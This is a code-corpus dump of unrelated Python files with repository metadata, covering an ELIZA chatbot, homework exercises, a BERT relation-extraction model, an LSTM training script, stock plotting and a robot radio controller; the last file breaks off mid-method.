[ "Don't you really %1?",
"Why don't you %1?",
"Do you want to %1?"]],
[r'I feel (.*)',
[ "Good, tell me more about these feelings.",
"Do you often feel %1?",
"When do you usually feel %1?",
"When you feel %1, what do you do?"]],
[r'I have (.*)',
[ "Why do you tell me that you've %1?",
"Have you really %1?",
"Now that you have %1, what will you do next?"]],
[r'I would (.*)',
[ "Could you explain why you would %1?",
"Why would you %1?",
"Who else knows that you would %1?"]],
[r'Is there (.*)',
[ "Do you think there is %1?",
"It's likely that there is %1.",
"Would you like there to be %1?"]],
[r'My (.*)',
[ "I see, your %1.",
"Why do you say that your %1?",
"When your %1, how do you feel?"]],
[r'You (.*)',
[ "We should be discussing you, not me.",
"Why do you say that about me?",
"Why do you care whether I %1?"]],
[r'Why (.*)',
[ "Why don't you tell me the reason why %1?",
"Why do you think %1?" ]],
[r'I want (.*)',
[ "What would it mean to you if you got %1?",
"Why do you want %1?",
"What would you do if you got %1?",
"If you got %1, then what would you do?"]],
[r'(.*) mother(.*)',
[ "Tell me more about your mother.",
"What was your relationship with your mother like?",
"How do you feel about your mother?",
"How does this relate to your feelings today?",
"Good family relations are important."]],
[r'(.*) father(.*)',
[ "Tell me more about your father.",
"How did your father make you feel?",
"How do you feel about your father?",
"Does your relationship with your father relate to your feelings today?",
"Do you have trouble showing affection with your family?"]],
[r'(.*) child(.*)',
[ "Did you have close friends as a child?",
"What is your favorite childhood memory?",
"Do you remember any dreams or nightmares from childhood?",
"Did the other children sometimes tease you?",
"How do you think your childhood experiences relate to your feelings today?"]],
[r'(.*)\?',
[ "Why do you ask that?",
"Please consider whether you can answer your own question.",
"Perhaps the answer lies within yourself?",
"Why don't you tell me?"]],
[r'quit',
[ "Thank you for talking with me.",
"Good-bye.",
"Thank you, that will be $150. Have a good day!"]],
[r'(.*)',
[ "Please tell me more.",
"Let's change focus a bit... Tell me about your family.",
"Can you elaborate on that?",
"Why do you say that %1?",
"I see.",
"Very interesting.",
"%1.",
"I see. And what does that tell you?",
"How does that make you feel?",
"How do you feel when you say that?"]]
]
#----------------------------------------------------------------------
# command_interface
#----------------------------------------------------------------------
'''def command_interface():
print('Therapist\n---------')
print('Talk to the program by typing in plain English, using normal upper-')
print('and lower-case letters and punctuation. Enter "quit" when done.')
print('='*72)
print('Hello. How are you feeling today?')
s = ''
therapist = Eliza();
while s != 'quit':
try:
s = input('> ')
except EOFError:
s = 'quit'
print(s)
while s[-1] in '!.':
s = s[:-1]
print(therapist.respond(s))
'''
|
[
"ferri.fc@gmail.com"
] |
ferri.fc@gmail.com
|
08e6e9616fe6a91d63adef510f938ac99e569b81
|
9249f87109471de1fc3f3c3c1b121f51c09df683
|
/lesson_3/test_10.py
|
89d99c4f00ee36886084f1928bbce7ee094081ba
|
[] |
no_license
|
anton1k/mfti-homework
|
400a8213a57e44478d65437f5afef0432e8e84ea
|
93683de329e6cb0001e713214aeb3069f6e213b0
|
refs/heads/master
| 2020-07-18T23:41:11.473608
| 2020-01-12T10:58:16
| 2020-01-12T10:58:16
| 206,335,501
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
# The sequence consists of natural numbers and ends with the number 0. At most
# 10000 numbers are entered (not counting the terminating 0). Determine how many
# elements of the sequence are equal to its largest element. Numbers following
# the 0 need not be read.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s)
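# Worked example (illustrative, not part of the original): for the input
# 4 4 2 4 0 the maximum is 4 and it occurs three times, so the program prints 3.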
|
[
"40913464+anton1k@users.noreply.github.com"
] |
40913464+anton1k@users.noreply.github.com
|
8ee3f4c7e8272328dcaab0d5419cc3d2fd076a9e
|
cfda84d6b814d5a1adadd06ca03be1c260d3820a
|
/scripts/poller_config.py
|
0a1d176f30ab49fc121b78ca2ea804dc1490efbc
|
[] |
no_license
|
thetherington/SDVN-IPG-Link-Monitor
|
6b4bab34e9549cecb2726f7f39ec060e6084707c
|
c06230cc7ff473a99f812c1a64bfd2987c0da4f2
|
refs/heads/master
| 2023-06-27T15:14:43.010344
| 2021-07-30T14:12:18
| 2021-07-30T14:12:18
| 296,078,442
| 0
| 0
| null | 2021-07-30T14:12:18
| 2020-09-16T15:47:43
|
Python
|
UTF-8
|
Python
| false
| false
| 834
|
py
|
import json
from edge_port import EdgeCollector
from insite_plugin import InsitePlugin
class Plugin(InsitePlugin):
def can_group(self):
return False
def fetch(self, hosts):
try:
self.collector
except Exception:
# from ThirtyRock_PROD_edge_def import return_reverselookup
params = {
# "dual_hot": True,
# "annotate_db": return_reverselookup(),
"magnum_cache": {
"insite": "127.0.0.1",
"nature": "mag-1",
"cluster_ip": hosts[-1],
"ipg_matches": ["570IPG-X19-25G", "SCORPION", "3067VIP10G-3G"],
},
}
self.collector = EdgeCollector(**params)
return json.dumps(self.collector.collect)
|
[
"thomas@hetheringtons.org"
] |
thomas@hetheringtons.org
|
e690cec87c5c720fb3cc337f89f24478e2089b17
|
5f84d6651095327f35885f0b7a563457152718f0
|
/seq2seq/bert_relation_extraction.py
|
74bd4e03fc09405ae0b19d8f7a888306f4bb350c
|
[] |
no_license
|
ElderWanng/BERTS2S
|
3a1bd7de227ecc95d5bfec542c7885d560e93590
|
85a6a138d3901b9c0890149a2403682d4d3cda96
|
refs/heads/master
| 2023-03-19T09:46:23.613734
| 2021-03-19T08:02:33
| 2021-03-19T08:02:33
| 343,244,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,516
|
py
|
## BERT relation extraction model
import torch
import torch.nn as nn
from seq2seq.BS2S_tokenizer import load_chinese_base_vocab, Tokenizer
from seq2seq.basic_bert import BasicBert
class BertRelationExtrac(BasicBert):
"""
"""
def __init__(self, word2ix, predicate_num, model_name="roberta"):
super(BertRelationExtrac, self).__init__()
self.predicate_num = predicate_num
config = ""
if model_name == "roberta":
from seq2seq.model.roberta_model import BertModel, BertConfig, BertPredictionHeadTransform, BertLayerNorm
config = BertConfig(len(word2ix))
self.bert = BertModel(config)
self.layer_norm = BertLayerNorm(config.hidden_size)
self.layer_norm_cond = BertLayerNorm(config.hidden_size, conditional=True)
elif model_name == "bert":
from seq2seq.model.bert_model import BertConfig, BertModel, BertPredictionHeadTransform, BertLayerNorm
config = BertConfig(len(word2ix))
self.bert = BertModel(config)
self.layer_norm = BertLayerNorm(config.hidden_size)
self.layer_norm_cond = BertLayerNorm(config.hidden_size, conditional=True)
else :
raise Exception("model_name_err")
self.subject_pred = nn.Linear(config.hidden_size, 2)
self.activation = nn.Sigmoid()
self.object_pred = nn.Linear(config.hidden_size, 2 * self.predicate_num)
def binary_crossentropy(self, labels, pred):
labels = labels.float()
loss = (-labels) * torch.log(pred) - (1.0 - labels) * torch.log(1.0 - pred)
return loss
def compute_total_loss(self, subject_pred, object_pred, subject_labels, object_labels):
"""
        Compute the loss.
"""
subject_loss = self.binary_crossentropy(subject_labels, subject_pred)
subject_loss = torch.mean(subject_loss, dim=2)
subject_loss = (subject_loss * self.target_mask).sum() / self.target_mask.sum()
object_loss = self.binary_crossentropy(object_labels, object_pred)
object_loss = torch.mean(object_loss, dim=3).sum(dim=2)
object_loss = (object_loss * self.target_mask).sum() / self.target_mask.sum()
return subject_loss + object_loss
def extrac_subject(self, output, subject_ids):
        ## Extract the vector representation of the subject span
batch_size = output.shape[0]
hidden_size = output.shape[-1]
start_end = torch.gather(output, index=subject_ids.unsqueeze(-1).expand((batch_size, 2, hidden_size)), dim=1)
subject = torch.cat((start_end[:, 0], start_end[:, 1]), dim=-1)
return subject
def forward(self, text, subject_ids, position_enc=None, subject_labels=None, object_labels=None, use_layer_num=-1):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
                # out of range
                raise Exception("Invalid layer choice: this BERT base model has 8 layers, so the parameter only allows 0 - 7; the default -1 takes the last layer")
        # compute the target mask
text = text.to(self.device)
subject_ids = subject_ids.to(self.device)
self.target_mask = (text > 0).float()
enc_layers, _ = self.bert(text,
output_all_encoded_layers=True)
squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
subject_pred_out = self.subject_pred(squence_out)
subject_pred_act = self.activation(subject_pred_out)
# subject_pred_act = subject_pred_act**2
subject_vec = self.extrac_subject(sub_out, subject_ids)
object_layer_norm = self.layer_norm_cond([sub_out, subject_vec])
object_pred_out = self.object_pred(object_layer_norm)
object_pred_act = self.activation(object_pred_out)
# object_pred_act = object_pred_act**4
batch_size, seq_len, target_size = object_pred_act.shape
object_pred_act = object_pred_act.reshape((batch_size, seq_len, int(target_size/2), 2))
predictions = object_pred_act
if subject_labels is not None and object_labels is not None:
            ## compute the loss
subject_labels = subject_labels.to(self.device)
object_labels = object_labels.to(self.device)
loss = self.compute_total_loss(subject_pred_act, object_pred_act, subject_labels, object_labels)
return predictions, loss
else :
return predictions
def predict_subject(self, text,use_layer_num=-1, device="cpu"):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
                # out of range
                raise Exception("Invalid layer choice: this BERT base model has 8 layers, so the parameter only allows 0 - 7; the default -1 takes the last layer")
text = text.to(self.device)
self.target_mask = (text > 0).float()
enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
# transform_out = self.layer_norm(squence_out)
subject_pred_out = self.subject_pred(squence_out)
subject_pred_act = self.activation(subject_pred_out)
# subject_pred_act = subject_pred_act**2
# subject_pred_act = (subject_pred_act > 0.5).long()
return subject_pred_act
def predict_object_predicate(self, text, subject_ids, use_layer_num=-1, device="cpu"):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
                # out of range
                raise Exception("Invalid layer choice: this BERT base model has 8 layers, so the parameter only allows 0 - 7; the default -1 takes the last layer")
        # compute the target mask
text = text.to(self.device)
subject_ids = subject_ids.to(self.device)
enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
subject_vec = self.extrac_subject(sub_out, subject_ids)
object_layer_norm = self.layer_norm_cond([sub_out, subject_vec])
object_pred_out = self.object_pred(object_layer_norm)
object_pred_act = self.activation(object_pred_out)
# object_pred_act = object_pred_act**4
batch_size, seq_len, target_size = object_pred_act.shape
object_pred_act = object_pred_act.view((batch_size, seq_len, int(target_size/2), 2))
predictions = object_pred_act
return predictions
|
[
"twang650@gatech.edu"
] |
twang650@gatech.edu
|
9cb940b5a3db52178cac627d10f24113dfe8b731
|
7b54f406d5ee41615553a47dc9791857dbf54901
|
/third_task.py
|
e5259b5389f53efe667ee89707a7a75f8cbbc231
|
[] |
no_license
|
CSCATT/py111_exm
|
571da9ff786bd2cf04d59489106b6fe8a071e1f5
|
4d380589bd3c2326ecde08bf9c846f463e68a88b
|
refs/heads/master
| 2021-01-16T01:46:00.413026
| 2020-02-25T10:04:55
| 2020-02-25T10:04:55
| 242,931,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 866
|
py
|
import networkx as nx
def finder(graph, start, visited):
    visited[start] = True
    print("visited: ---> ", visited, "\n")
    print(start, graph.adj[start])
    # Walk the graph depth-first from this node
    for node in graph.adj[start]:
        if not visited[node]:  # if not visited
            finder(graph, node, visited)
    return None
if __name__ == "__main__":
graph = nx.Graph()
graph.add_nodes_from("ABCDEFGHJKL")
graph.add_edges_from([('A', 'B'),
('B', 'C'),
('C', 'D'),
('F', 'G'),
                          ('G', 'H'), #* test edges
                          ('J', 'K'), #*
                          ('K', 'L')]) #*
visited = {node: False for node in graph.nodes()}
num = 0
for node in graph.adj:
if not visited[node]: # if not visited
finder(graph, node, visited)
num += 1
print("-----")
print(num)
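# Illustrative note (not part of the original): with the test edges above the
# graph has four connected components ({A,B,C,D}, {E}, {F,G,H}, {J,K,L}),
# so the program prints 4.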
|
[
"x2g.tillo.g@inbox.ru"
] |
x2g.tillo.g@inbox.ru
|
0b5b1489acfdeeee4d89ecac70ec0e14e54021d5
|
b103ea4b64ba5175f7dc2decac390980d745ed8f
|
/FCN_LSTM/model/bilstm/temp_file/train_model256.py
|
97f7fd93b14cf97c5b84868642c2a11a9dc6fedf
|
[] |
no_license
|
wangye8899/Fully_Convolutional_Network_Time_Series
|
2f08611fc312d3f9e5a53a42369cf90679f3552f
|
3e799dbec98b2facdd0a56c482023c7dff6e9e80
|
refs/heads/master
| 2020-07-05T02:34:07.104037
| 2019-11-02T02:28:56
| 2019-11-02T02:28:56
| 202,495,853
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,872
|
py
|
import tensorflow as tf
import configparser
import os
import random
import numpy as np
from model256 import model_
from batch_read256 import read_csv_,TFRecordReader
file = './config/parameter_256_3_5.ini'
# Read the config file
def read_config(file):
cf = configparser.ConfigParser()
cf.read(file)
learning_rate = cf.getfloat('model','learning_rate')
training_steps = cf.getint('model','train_steps')
batch_size = cf.getint('model','batch_size')
display_step = cf.getint('model','display_step')
test_steps = cf.getint('model','test_steps')
num_input = cf.getint('model','num_input')
num_hidden = cf.getint('model','num_hidden')
num_classes = cf.getint('model','num_classes')
timesteps = cf.getint('model','timesteps')
epoch_num = cf.getint('model','epoch_num')
Is_Vali = cf.getint('model','Is_Vali')
train_file = cf.get('file','train_file')
test_file = cf.get('file','test_file')
val_file = cf.get('file','val_file')
model_file = cf.get('file','model_file')
test_file_path = cf.get('file','data_file_path')
plot_train_step = cf.getint('model','plot_train_steps')
strides = cf.getint('model','strides')
num_channels = cf.getint('model','num_channels')
model_file = cf.get('file','model_file')
return num_hidden, strides,num_channels,num_input,learning_rate,train_file,epoch_num,training_steps,batch_size,display_step,num_classes,Is_Vali,val_file,plot_train_step,model_file
# Unpack the returned values
num_hidden,strides,num_channels,num_input,learning_rate,train_file,epoch_num,training_steps,batch_size ,display_step,num_classes,Is_Vali,val_file,plot_train_step,model_file= read_config(file)
init = tf.keras.initializers.he_uniform()
weights={
'conv1':tf.Variable(init([7,1,128])),
'conv2':tf.Variable(init([5,128,256])),
'conv3':tf.Variable(init([3,256,128])),
'out':tf.Variable(init([2*num_hidden,2]))
}
biases ={
'conv1':tf.Variable(init([128])),
'conv2':tf.Variable(init([256])),
'conv3':tf.Variable(init([128])),
'out':tf.Variable(init([2]))
}
# Define the input data and label placeholders
X_CNN = tf.placeholder(tf.float32,[None,30,1],name='X')
X_LSTM = tf.placeholder(tf.float32,[None,256,30],name='X_')
Y = tf.placeholder(tf.float32,[None,num_classes],name='Y')
# Define the loss and the optimizer
model_ = model_(X_CNN,X_LSTM,num_hidden,weights,biases)
logits = model_.modeling()
prediction = tf.nn.softmax(logits)
# Compute the loss
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=Y))
# Define the optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_process = optimizer.minimize(loss_op)
# Define the accuracy metric
acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(prediction,1),tf.argmax(Y,1)),tf.float32))
# Save the model
meraged = tf.summary.merge_all()
tf.add_to_collection('loss',loss_op)
tf.add_to_collection('accuracy',acc)
tf.add_to_collection('prediction',prediction)
sess = tf.Session()
# Initialize variables
init = tf.global_variables_initializer()
# tf.get_default_graph().finalize()
data,label,_ = TFRecordReader(train_file,0)
label = tf.cast(label,tf.int32)
label = tf.one_hot(label,2)
data = tf.reshape(data,[5000,256,30])
val_data , val_label,_ = TFRecordReader(val_file,0)
val_data = val_data[:20]
val_label = val_label[:20]
val_label = tf.cast(val_label,tf.int32)
val_label = tf.one_hot(val_label,2)
val_label = tf.reshape(val_label,[20*256,2])
val_data_cnn = tf.reshape(val_data,[20*256,num_input,1])
val_data_lstm = tf.reshape(val_data,[20,256,num_input])
with tf.Session() as sess:
count = 0
temp_acc = 0
sess.run(init)
    # Read the data and adjust shapes so the inputs are correct
data = sess.run(data)
label = sess.run(label)
val_data_cnn_ = sess.run(val_data_cnn)
val_label_ = sess.run(val_label)
val_data_lstm_ = sess.run(val_data_lstm)
for epoch in range(epoch_num):
print("Epoch"+str(epoch))
for step in range(1,training_steps+1):
            # Randomly pick one CSV to train on each step
random_index = random.randint(0,4999)
batch_data = data[random_index]
batch_label = label[random_index]
batch_data_cnn = np.reshape(batch_data,[batch_size*256,num_input,1])
batch_data_lstm = np.reshape(batch_data,[batch_size,256,num_input])
batch_label = np.reshape(batch_label,[batch_size*256,2])
            # Run one training step
sess.run(train_process,feed_dict={X_CNN:batch_data_cnn,X_LSTM:batch_data_lstm,Y:batch_label})
            # Compute the loss and accuracy
loss,accu = sess.run([loss_op,acc],feed_dict={X_CNN:batch_data_cnn,X_LSTM:batch_data_lstm,Y:batch_label})
            # Print progress
if step%display_step==0:
print("Step " + str(step) + ", Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(accu))
        # After each epoch, evaluate on the validation set
Val_loss,Val_acc = sess.run([loss_op,acc],feed_dict={X_CNN:val_data_cnn_,X_LSTM:val_data_lstm_,Y:val_label_})
if epoch==0:
temp_loss = Val_loss
else:
if (Val_loss-temp_loss) < 0:
                # The loss is still decreasing
                print("loss improved: "+str(temp_loss)+" ---> "+str(Val_loss)+" || learning rate: "+str(learning_rate))
                temp_loss = Val_loss
else:
                # The model did not improve over this epoch
                count+=1
                print("loss did not improve: "+str(count)+" times ---> "+str(Val_loss))
if Val_acc>temp_acc:
# temp_loss = Val_loss
tf.train.Saver().save(sess,model_file+'model')
else:
pass
print("validation acc"+"{:.4f}".format(Val_acc)+"validation loss"+"{:.4f}".format(Val_loss))
|
[
"3091485316@qq.com"
] |
3091485316@qq.com
|
30a1390b789e4bd86190b477b462d67108f7a4a3
|
e1857e582609640f60923ea461da3e84c498095a
|
/block2-datatypes/numbers/number-demo.py
|
671907978a108eb946e216b4c5cc6293cf1ca1c1
|
[] |
no_license
|
mbaeumer/python-challenge
|
178f188004e66c5c4092af51ae5d496679d39dec
|
4cff4a4939268a496117158b0be4e20f4d934213
|
refs/heads/master
| 2023-08-07T22:43:35.490777
| 2023-07-21T21:26:46
| 2023-07-21T21:26:46
| 75,015,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
#!/usr/bin/python
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
|
[
"martin.baeumer@gmail.com"
] |
martin.baeumer@gmail.com
|
6e7957bb1f333a3da864d18a81ae420ab74e4ffa
|
f19c5436c7173835a3f1d064541ee742178e213a
|
/mah/Programmers/메뉴 리뉴얼.py
|
20b5a552218aadd52b2828f25d2f9f8a092c26d5
|
[] |
no_license
|
hongsungheejin/Algo-Study
|
f1c521d01147a6f74320dbc8efe3c1037e970e73
|
d6cb8a2cc6495ccfcfb3477330a3af95895fae32
|
refs/heads/main
| 2023-07-06T10:58:27.258128
| 2021-07-29T02:11:13
| 2021-07-29T02:11:13
| 379,269,918
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 914
|
py
|
from itertools import combinations
def solution(orders, course):
candi = {}
course = set(course)
for order in orders:
order = sorted(order)
for i in range(2, len(order)+1):
for combi in combinations(order, i):
combi = "".join(combi)
if combi in candi:
candi[combi] += 1
else:
candi[combi] = 1
answer = []
candis = {k:v for k, v in sorted(candi.items(), key=lambda x: (len(x[0]), x[1])) if v>=2}
for c in course:
tmp = {}
max_v = 0
for k, v in sorted(candis.items(), key=lambda x:x[0]):
if len(k) == c:
max_v = max(max_v, v)
if v in tmp: tmp[v].append(k)
else: tmp[v] = [k]
if max_v in tmp:
answer.extend(tmp[max_v])
return sorted(answer)
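# Usage sketch (illustrative, not part of the original):
# solution(["XYZ", "XWY", "WXA"], [2, 3, 4]) returns ["WX", "XY"], the
# 2-item combinations ordered at least twice, sorted alphabetically.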
|
[
"mai.hong0924@gmail.com"
] |
mai.hong0924@gmail.com
|
f2942c7cf18c1edb7f563ce2408bde73246dbeb1
|
ada7983995e346c8c676d0bbe5ed2397ff54b930
|
/day14/day14-part1.py
|
451c7c5344789dfa26f143c5012eba98666b0c06
|
[] |
no_license
|
hergin/AdventOfCode2020
|
4dc54e31308ae8584407f5c0917bcdb2f0aa44fa
|
e700d5bc15d689cc6c22e37d9a6170649901b3b0
|
refs/heads/master
| 2023-02-09T02:47:15.922678
| 2020-12-24T03:30:31
| 2020-12-24T03:30:31
| 321,268,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
import os, sys, math
def applyMask(value,mask):
maskedValue = 0
tempValue = value
for i in range(0,len(mask)):
maskedValue *= 2
twoPowerI = 2**(35-i)
if mask[i] == '1':
maskedValue += 1
elif mask[i] == 'X':
if tempValue >= twoPowerI:
maskedValue += 1
if tempValue >= twoPowerI:
tempValue -= twoPowerI
return maskedValue
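# Worked example (illustrative, not part of the original): applying the mask
# 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X' to the value 11 forces bit 6 to 1 and
# bit 1 to 0, so applyMask returns 73.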
currentMask = ""
memory = {}
for line in open(os.path.join(sys.path[0], "input14.txt")):
values = line.strip().split(' ')
if values[0] == "mask":
currentMask = values[2]
else:
memoryIndex = int(values[0][4:][:-1])
value = int(values[2])
valueAfterMask = applyMask(value, currentMask)
memory[memoryIndex] = valueAfterMask
print("mask:",currentMask,"memoryIndex:",memoryIndex,"value:",value,"maskedValue:",valueAfterMask)
#print(memory)
print("Result",sum(memory.values()))
|
[
"hergin@bsu.edu"
] |
hergin@bsu.edu
|
632b5d2161af536c55b014590d765fb51b0d4cce
|
6d3b34e64e3ee6bdcdabbf6aad8aa3da3ef080e9
|
/New Workspace/multithreading/usingsubclass.py
|
cf1535d211d7aa66869c0d5422314a74b016fb61
|
[] |
no_license
|
himani1213/SpringMicroservices
|
15a9c84dc9a9309b1a47af74f39b34a708b228f2
|
2a62068374602da1d7d5f98afc1c62c60ba560ed
|
refs/heads/master
| 2020-09-27T01:20:43.149587
| 2020-02-28T15:15:35
| 2020-02-28T15:15:35
| 226,388,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
from threading import Thread
class MyThread(Thread):
def run(self):
i = 0
        while i <= 10:
            print(i)
            i += 1
t = MyThread()
t.start()
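# Usage note (illustrative, not part of the original): call t.join() here if
# the main thread should wait for the counter to finish before exiting.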
|
[
"hsingl34@in.ibm.com"
] |
hsingl34@in.ibm.com
|
7358f4249de375c62f19800234d1ccfa24c2fa5c
|
000dcb0cf680486fd3c2f7afad0dd7935e2b8a36
|
/finance/stocks.py
|
a05e65142cf900790aad702c5367b1dac1064d4d
|
[] |
no_license
|
arnoldas500/machineLearning
|
d51419a10a1bbad8cd8acb15225e52d01d4cd176
|
73124d7a9a7831f5f567142e2362e6ae9413d871
|
refs/heads/master
| 2021-09-03T01:43:52.567755
| 2018-01-04T16:41:40
| 2018-01-04T16:41:40
| 103,578,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,413
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import pandas_datareader.data as web
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
style.use('ggplot')
'''
#can specify start and end dates
start = dt.datetime(2000,1,1)
end = dt.datetime(2016,12,31)
#data from yahoo finance api for tesla stock
df = web.DataReader('TSLA', 'yahoo', start, end)
#reading a csv in of your own
df = pd.read_csv('filename', parse_dates=True, index_col=0);
#giving it a date time index by doing parse_dates=True, index_col=0
print(df.head())
#will graph for you and give you a legend
df.plot()
plt.show()
#if you want to plot something very specific you can reference the specific columns in pandas
df['Adj. Close'].plot()
print(df[['Open','Close']].head())
'''
#can specify start and end dates
start = dt.datetime(2000,1,1)
end = dt.datetime(2016,12,31)
#data from yahoo finance api for tesla stock
df = web.DataReader('TSLA', 'yahoo', start, end)
'''
#df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
#creating our own col in the data frame called 100 moving avg (takes todays price and 99 of prev close price and takes the avg of them)
df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
print(df.head())
#6,1 is 6 by 1 and starting at 0,0
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
#sharex=ax1 makes both the plots share an x axis so when you zoom in on one the other will also zoom in accordingly
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
#plots a line which takes in x and y , x = df.index and y = ajd close
ax1.plot(df.index, df['Adj Close'])
ax1.plot(df.index, df['100ma'])
ax2.bar(df.index, df['Volume'])
plt.show()
'''
#doing some resampling and candlestick plots
#lets say you collect data every min or whatever, but you need hourly data, then you can resample to be hourly data from min data
#resample from daily data to 10 day data can do .mean ect we are using .ohlc=open high low close
df_ohlc = df['Adj Close'].resample('10D').ohlc()
#taking sum over 10 days of vol
df_volume = df['Volume'].resample('10D').sum()
#can get all of the values of a datafram by doing df.values
#reseting index so date is now a column
df_ohlc.reset_index(inplace=True)
#convert the date to mdates since thats what matplotlib uses (dont know why)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num) #map just maps this onto every date to convert from date to mdates object
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
ax1.xaxis_date()
#where the candle stick is filled in shows the open and close low and high
candlestick_ohlc(ax1, df_ohlc.values, width=5, colorup='g')
#fills from 0 to vol high on second plot
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
|
[
"akurbanovas@albany.edu"
] |
akurbanovas@albany.edu
|
a66ea0e584b1c0c16a1073e306b633b0ae4bd795
|
3da102290ebe6c186474ecbeec9065ea2e5357e3
|
/pi/robot.py
|
4d162feefe0008daae6f7e2e33d88865d9c46d45
|
[] |
no_license
|
fo-am/penelopean-robotics
|
55cbbebe29f15fe5996222a5db36040ac400b8f3
|
2a6f81a4d8b098ac513bd42df980e64128df8a1b
|
refs/heads/master
| 2022-05-28T17:46:36.579042
| 2022-05-19T13:35:47
| 2022-05-19T13:35:47
| 134,366,263
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,976
|
py
|
import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
